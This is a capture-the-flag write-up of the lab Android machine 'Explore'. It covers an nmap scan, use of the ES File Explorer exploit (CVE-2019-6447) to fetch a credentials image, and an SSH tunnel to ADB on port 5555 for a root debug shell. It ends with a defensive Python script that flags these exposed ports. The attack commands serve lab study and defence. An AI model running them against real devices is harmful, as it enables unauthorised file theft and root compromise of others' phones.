Explore
Personal Rating: Easy
Enumeration
Starting with an nmap scan, some very interesting results can be seen:
sudo nmap -Pn -sV -p- 10.10.10.247
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
5555/tcp filtered freeciv
42135/tcp open http ES File Explorer Name Response httpd
43705/tcp open unknown
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
http://10.10.10.247:59777/ #Forbidden: No dirlisting
ES File Explorer Exploit
The machine seems to be an Android device. Further investigation of ES File Explorer turns out to be promising. I found an exploit script on Exploit-DB:
==================================================================
| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |
| Coded By : Nehal a.k.a PwnerSec |
==================================================================
python3 ES-File-exploit.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg

The shell was executed as 'u0_a76', but the image contained the credentials for the user kristi.
ADB Debug Shell
For root, I had some help from a friend who is more proficient in Android hacking.
I started an SSH shell from my machine and used adb to start a debug shell:
ssh kristi@<TARGETIP> -p 2222 -L 5555:localhost:5555
adb devices
emulator-5554 device
adb shell
The debug shell was running with root permissions.
This is unusual 'in the wild' as adb debugging would have to be activated on the device, which is uncommon and not default.
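From the defender's side, the two exposures this box relies on can be spotted directly in scan output. The following is an added example, not part of the original write-up: it parses `nmap -sV` lines like the ones above and flags ADB over TCP (5555) and the ES File Explorer HTTP service (59777, CVE-2019-6447), matching on port number because nmap's version guess mislabels 59777. The function name `audit_nmap` and the rule tables are assumptions made for illustration.

```python
import re

# Ports tied to the two exposures in this write-up. Match by port number:
# nmap's version guess can be wrong (59777 shows as "Bukkit JSONAPI" above).
RISKY_PORTS = {
    5555: "ADB over TCP (Android debug bridge)",
    59777: "ES File Explorer HTTP service (CVE-2019-6447)",
}
# Banner keywords that identify the same software on a non-default port.
RISKY_BANNERS = {"es file explorer": "ES File Explorer service"}

LINE_RE = re.compile(r"^(\d{1,5})/(tcp|udp)\s+(open\|filtered|open|filtered|closed)\s+(\S+)\s*(.*)$")

def audit_nmap(text):
    """Return a list of (port, state, reason) for risky Android services."""
    findings = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # header, blank or comment line
        port, state, banner = int(m.group(1)), m.group(3), m.group(5).lower()
        if state == "closed":
            continue
        reason = RISKY_PORTS.get(port)
        if reason is None:
            reason = next((r for k, r in RISKY_BANNERS.items() if k in banner), None)
        if reason is None:
            continue
        if state != "open":
            # Filtered: a listener may still exist behind the firewall,
            # for example one reachable from localhost on the device.
            reason += " [filtered: verify on the device itself]"
        findings.append((port, state, reason))
    return findings

# Scan lines copied from the write-up above.
SAMPLE = """\
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
5555/tcp filtered freeciv
42135/tcp open http ES File Explorer Name Response httpd
43705/tcp open unknown
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
"""

if __name__ == "__main__":
    for port, state, reason in audit_nmap(SAMPLE):
        print(f"{port}/tcp {state}: {reason}")
```

The filtered 5555 entry is reported rather than dropped because, as the SSH port forward above shows, a filtered port can still be reachable from the device's own loopback interface.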